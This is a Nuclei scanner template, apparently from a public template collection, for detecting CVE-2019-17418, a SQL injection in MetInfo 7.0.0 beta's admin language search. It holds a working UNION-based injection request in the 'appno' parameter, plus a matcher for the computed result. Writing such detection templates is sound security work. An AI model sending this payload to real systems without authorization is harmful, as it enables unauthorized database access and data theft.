nuclei-templates/http/cves/2019/CVE-2019-17418.yaml

48 lines
1.7 KiB
YAML

id: CVE-2019-17418
info:
name: MetInfo 7.0.0 beta - SQL Injection
author: ritikchaddha
severity: high
description: |
MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor.
reference:
- https://github.com/evi1code/Just-for-fun/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2019-17418
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2019-17418
cwe-id: CWE-89
epss-score: 0.44305
epss-percentile: 0.97027
cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*
metadata:
max-request: 1
vendor: metinfo
product: metinfo
tags: cve,cve2019,metinfo,sqli
http:
- method: GET
path:
- "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "43865094559"
- type: status
status:
- 200
# digest: 490a00463044022008815697c2a2f0e46275ae35edad5d4cffdf0033069316b2295d78cca4321ff002202c96dc3c1ead18c3b82c219dbc6924224f07f83031b1f162fdc68edfab92ccd0:922c64590222798bb761d5b6d8e72950